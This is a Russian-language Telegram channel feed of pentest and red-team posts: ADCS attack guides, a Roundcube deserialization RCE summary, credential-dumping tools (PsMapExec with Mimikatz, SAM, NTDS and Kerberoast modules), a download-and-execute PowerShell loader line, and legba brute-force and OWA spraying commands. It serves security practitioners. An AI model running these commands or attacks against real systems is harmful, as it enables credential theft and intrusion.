Forwarded from Ralf Hacker Channel (Ralf Hacker)
Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
xbz0n.sh
Breaking ADCS: ESC1 to ESC16 Attack Techniques
Let's talk about Active Directory Certificate Services. If you've been doing red team work for any length of time, you've probably heard about ADCS attacks. ...
Google Docs
ADCS Attack Techniques Cheatsheet
И в дополнение к предыдущему посту, сравнительная табличка по инструментам
Отличная шпаргалка по атакам на ADCS
Разобраны основные инструменты для проверки и эксплуатации уязвимостей
#adcs #active_directory #windows #esc #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Forwarded from Пакет Безопасности
Красивое
TAdviser сделал карту кибератак, нацеленных на Россию. Тут и цветовая разбивка по источникам, и разделение по сферам деятельности целей атак, и даже конкретные хакерские группировки указаны. Ну и описание всего этого тоже есть.
Так что смотрим, изучаем, делимся.
⚡ Пакет Безопасности | 💬 Чат
🛍 Другие каналы
TAdviser сделал карту кибератак, нацеленных на Россию. Тут и цветовая разбивка по источникам, и разделение по сферам деятельности целей атак, и даже конкретные хакерские группировки указаны. Ну и описание всего этого тоже есть.
Так что смотрим, изучаем, делимся.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cybred
🔥 9.9 Critical
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
Пошагово, как работает эксплоит:
1. Подменяет
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
4. Во время вызова GPG-логики, Roundcube вызывает
5. Триггерится код из первого шага
exploit // nuclei // research
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
_from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения. ?_task=settings&_action=upload&_from=mail%2Finbox
Пошагово, как работает эксплоит:
1. Подменяет
_from сериализованным объектом.2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
rcube_pgp_engine → Crypt_GPG_Engine.4. Во время вызова GPG-логики, Roundcube вызывает
unserialize().5. Триггерится код из первого шага
exploit // nuclei // research
Курируемый список инструментов с BlackHat конференций, сгруппированный по событию (USA, Europe, Asia), году и категории
➡️ Miscellaneous / Lab Tools➡️ Web/AppSec➡️ Web/AppSec or Red Teaming➡️ Red Teaming➡️ Red Teaming / AppSec➡️ Blue Team & Detection➡️ Reverse Engineering➡️ OSINT
#tools #blackhat #event
Please open Telegram to view this post
VIEW IN TELEGRAM
Простой скрипт для извлечения полезных данных из Neo4j базы, которую использует Bloodhound
Наглядно выводит информацию в консоль, коротко и по делу
python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy
#redteam #bloodhound #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2 1
Решения задач на прошедший VKACTF, в котором приняли участие и заняли 2ое место
#ctf #vkactf2025
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Отличный инструмент для пост эксплуатации в
UPD. 0.8.0
Добавили 2 метода:
LDAP / LDAPS
SSH - для дампа ключей
Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 LDAP / LDAPS🔵 SSH🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3 2 1
Инструмент для удаленного выполнения команд в
Service Control Manager (MS-SCMR)
Task Scheduler (MS-TSCH)
Distributed Component Object Model (MS-DCOM)
Windows Management Instrumentation (MS-WMI)
#goexec #redteam #soft #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Whitehat Lab
🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE)
Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности
Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа 🧙
🔗 HTB CAPE
Коротко о курсе:…
Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности
Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа 🧙
🔗 HTB CAPE
Коротко о курсе:…
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6 2🤝1
Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на
Запуск в режиме black box:
cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k
Запуск в режиме context mode:
cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml
Запуск в режиме continuous fuzzing:
cats random --contract=openapi.yaml --server=http://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10
📚 Тестируем Github API с CATS
#soft #cats #java #fuzzer
Please open Telegram to view this post
VIEW IN TELEGRAM
Как и обещал, выкладываю обзор
Вопросы автору можно задать в чате или комментариях
Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации.
HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.
Коротко о курсе:
Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста
#htb #cert #exam
Please open Telegram to view this post
VIEW IN TELEGRAM
Быстрый брутфорсер с поддержкой большого количества протоколов, написан на Rust
AMQP
Cassandra/ScyllaDB
FTP
HTTP
IMAP
IRC
LDAP
MongoDB
MQTT
Microsoft SQL
MySQL
Oracle
PostgreSQL
POP3
RDP
Redis
Samba
SSH / SFTP
SMTP
Telnet
VNC
Установка:
cargo install legba
Пример HTTP basic auth:
legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/
Поддерживает YAML в качестве шаблонов настройки
legba \
-R cookbook/http/ms-exchange/owa.yml \
-U users.txt \
-P passwords.txt \
"host=ms-server.local"
description: Microsoft Exchange bruteforce via OWA endpoint.
author: evilsocket
plugin: http
args:
target: "{$schema or https}://{$host}:{$port or 443}/owa/auth.owa"
http-method: POST
http-success-codes: 302
http-success-string: set-cookie
http-payload: destination={$schema or https}://{$host}:{$port or 443}/&flags=4&username={USERNAME}&password={PASSWORD}
#legba #soft #rust #brute
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Huntress
Recutting the Kerberos Diamond Ticket | Huntress
Clear up common misconceptions about the Kerberos Diamond Ticket and learn how to refine the technique for better OPSEC, including more realistic PAC details and support for service tickets. You’ll learn how to apply the idea securely to both Ticket Granting…
Please open Telegram to view this post
VIEW IN TELEGRAM
sakana.ai
Sakana AI
The Darwin Gödel Machine: AI that improves itself by rewriting its own code
Будем посмотреть.
Родом из 🇯🇵 Японии
Есть такая идея — Машина Гёделя: ИИ, который сам себя улучшает. Её в 2003-м придумал Юрген Шмидхубер. Названа в честь математика Курта Гёделя, который показал, что система не может доказать собственную непротиворечивость
#ai #sakana
Please open Telegram to view this post
VIEW IN TELEGRAM